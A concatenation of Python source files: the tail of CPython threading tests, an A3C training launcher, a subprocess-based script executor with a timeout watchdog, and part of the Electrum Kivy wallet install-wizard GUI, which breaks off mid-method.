t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
if __name__ == "__main__":
unittest.main()
|
main.py
|
from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import my_optim
from envs import create_atari_env
from model import ActorCritic
from test import test
from train import train
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001,
help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--tau', type=float, default=1.00,
help='parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=0.01,
help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
help='value loss coefficient (default: 0.5)')
parser.add_argument('--max-grad-norm', type=float, default=50,
help='value loss coefficient (default: 50)')
parser.add_argument('--seed', type=int, default=1,
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4,
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=20,
help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=1000000,
help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='PongDeterministic-v4',
help='environment to train on (default: PongDeterministic-v4)')
parser.add_argument('--no-shared', default=False,
help='use an optimizer without shared momentum.')
if __name__ == '__main__':
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = ""
args = parser.parse_args()
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = ActorCritic(
env.observation_space.shape[0], env.action_space)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
p.start()
processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, counter, lock, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
|
PythonExecutor.py
|
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import logging
import os
import subprocess
import pprint
import threading
from threading import Thread
from Grep import Grep
import shell, sys
logger = logging.getLogger()
class PythonExecutor:
"""
Performs functionality for executing python scripts.
Warning: class maintains internal state. As a result, instances should not be
used as a singleton for a concurrent execution of python scripts
"""
NO_ERROR = "none"
grep = Grep()
event = threading.Event()
python_process_has_been_killed = False
def __init__(self, tmpDir, config):
self.tmpDir = tmpDir
self.config = config
pass
def run_file(self, script, script_params, tmpoutfile, tmperrfile, timeout,
tmpstructedoutfile, logger_level, override_output_files = True):
"""
Executes the specified python file in a separate subprocess.
Method returns only when the subprocess is finished.
Params arg is a list of script parameters
Timeout meaning: how many seconds should pass before script execution
is forcibly terminated
override_output_files option defines whether stdout/stderr files will be
recreated or appended
"""
if override_output_files: # Recreate files
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
else: # Append to files
tmpout = open(tmpoutfile, 'a')
tmperr = open(tmperrfile, 'a')
# need to remove this file for the following case:
# status call 1 does not write to file; call 2 writes to file;
# call 3 does not write to file, so contents are still call 2's result
try:
os.unlink(tmpstructedoutfile)
except OSError:
pass # no error
script_params += [tmpstructedoutfile, logger_level]
pythonCommand = self.python_command(script, script_params)
logger.info("Running command " + pprint.pformat(pythonCommand))
process = self.launch_python_subprocess(pythonCommand, tmpout, tmperr)
logger.debug("Launching watchdog thread")
self.event.clear()
self.python_process_has_been_killed = False
thread = Thread(target = self.python_watchdog_func, args = (process, timeout))
thread.start()
# Waiting for the process to be either finished or killed
process.communicate()
self.event.set()
thread.join()
# Building results
error = self.NO_ERROR
returncode = process.returncode
out = open(tmpoutfile, 'r').read()
error = open(tmperrfile, 'r').read()
try:
with open(tmpstructedoutfile, 'r') as fp:
structured_out = json.load(fp)
except Exception:
if os.path.exists(tmpstructedoutfile):
errMsg = 'Unable to read structured output from ' + tmpstructedoutfile
structured_out = {
'msg' : errMsg
}
logger.warn(structured_out)
else:
structured_out = {}
if self.python_process_has_been_killed:
error = str(error) + "\n Python script has been killed due to timeout"
returncode = 999
result = self.condenseOutput(out, error, returncode, structured_out)
logger.info("Result: %s" % result)
return result
def launch_python_subprocess(self, command, tmpout, tmperr):
"""
Creates subprocess with given parameters. This functionality was moved to separate method
to make possible unit testing
"""
return subprocess.Popen(command,
stdout=tmpout,
stderr=tmperr, close_fds=True)
def isSuccessfull(self, returncode):
return not self.python_process_has_been_killed and returncode == 0
def python_command(self, script, script_params):
python_binary = sys.executable
python_command = [python_binary, script] + script_params
return python_command
def condenseOutput(self, stdout, stderr, retcode, structured_out):
log_lines_count = self.config.get('heartbeat', 'log_lines_count')
grep = self.grep
result = {
"exitcode": retcode,
"stdout": grep.tail(stdout, log_lines_count) if log_lines_count else stdout,
"stderr": grep.tail(stderr, log_lines_count) if log_lines_count else stderr,
"structuredOut" : structured_out
}
return result
def python_watchdog_func(self, python, timeout):
self.event.wait(timeout)
if python.returncode is None:
logger.error("Subprocess timed out and will be killed")
shell.kill_process_with_children(python.pid)
self.python_process_has_been_killed = True
pass
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.uix.togglebutton import ToggleButton
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum.base_wizard import BaseWizard
from electrum.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum.gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum/gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://electrum/gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<SeedDialogHeader@GridLayout>
text: ''
options_dialog: None
rows: 1
orientation: 'horizontal'
size_hint: 1, None
height: self.minimum_height
BigLabel:
size_hint: 9, None
text: root.text
IconButton:
id: options_button
height: '30dp'
width: '30dp'
size_hint: 1, None
icon: 'atlas://electrum/gui/kivy/theming/light/gear'
on_release:
root.options_dialog() if root.options_dialog else None
<RestoreSeedDialog>
message: ''
word: ''
SeedDialogHeader:
id: seed_dialog_header
text: 'ENTER YOUR SEED PHRASE'
options_dialog: root.options_dialog
GridLayout:
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://electrum/gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
SeedDialogHeader:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
options_dialog: root.options_dialog
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '48dp'
SeedLabel:
text: root.warning
<ChoiceLineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
SeedLabel:
text: root.message2
TextInput:
id: text_input
multiline: False
size_hint: 1, None
height: '48dp'
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
self.auto_dismiss = False
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
self._trigger_size_dialog = Clock.create_trigger(self._size_dialog)
# note: everything bound here needs to be unbound as otherwise the
# objects will be kept around and keep receiving the callbacks
Window.bind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
self._trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_keyboard(self, instance, key, keycode, codepoint, modifier):
if key == 27:
if self.wizard.can_go_back():
self.wizard.go_back()
else:
app = App.get_running_app()
if not app.is_exit:
app.is_exit = True
app.show_info(_('Press again to exit'))
else:
self._on_release = False
self.dismiss()
return True
def on_dismiss(self):
Window.unbind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
self.wizard.terminate(aborted=True)
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.title = kwargs.get('message', '')
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
self.init_choices(choices)
def init_choices(self, choices):
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.title = kwargs.get('title', '')
self.message = kwargs.get('message', '')
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class CLButton(ToggleButton):
def on_release(self):
self.root.script_type = self.script_type
self.root.set_text(self.value)
class ChoiceLineDialog(WizardChoiceDialog):
title = StringProperty('')
message1 = StringProperty('')
message2 = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.title = kwargs.get('title', '')
self.message1 = kwargs.get('message1', '')
self.message2 = kwargs.get('message2', '')
self.choices = kwargs.get('choices', [])
default_choice_idx = kwargs.get('default_choice_idx', 0)
self.ids.next.disabled = False
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for idx, (script_type, title, text) in enumerate(self.choices):
b = CLButton(text=title, height='30dp', group=self.title, allow_no_selection=False)
b.script_type = script_type
b.root = self
b.value = text
layout.add_widget(b)
if idx == default_choice_idx:
b.trigger_action(duration=0)
def set_text(self, value):
self.ids.text_input.text = value
def get_params(self, b):
return (self.ids.text_input.text, self.script_type)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(ext, _):
self.ext = ext
d = SeedOptionsDialog(self.ext, None, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum.mnemonic import Mnemonic
from electrum.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
self.bip39 = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(ext, bip39):
self.ext = ext
self.bip39 = bip39
self.update_next_button()
d = SeedOptionsDialog(self.ext, self.bip39, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def update_next_button(self):
self.ids.next.disabled = False if self.bip39 else not bool(self._test(self.get_text()))
def on_text(self, dt):
self.update_next_button()
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), self.bip39, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def __init__(self, *args, **kwargs):
RestoreSeedDialog.__init__(self, *args, **kwargs)
self.ids.seed_dialog_header.ids.options_button.disabled = True
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
def is_valid(x):
try:
return kwargs['is_valid'](x)
except:
return False
self.is_valid = is_valid
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
def protected_on_finished():
try:
on_finished()
except Exception as e:
self.show_error(str(e))
Clock.schedule_once(lambda dt: protected_on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://electrum/gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, *, storage=None, aborted=False):
if storage is None and not aborted:
storage = self.create_storage(self.path)
self.dispatch('on_wizard_complete', storage)
def choice_dialog(self, **kwargs):
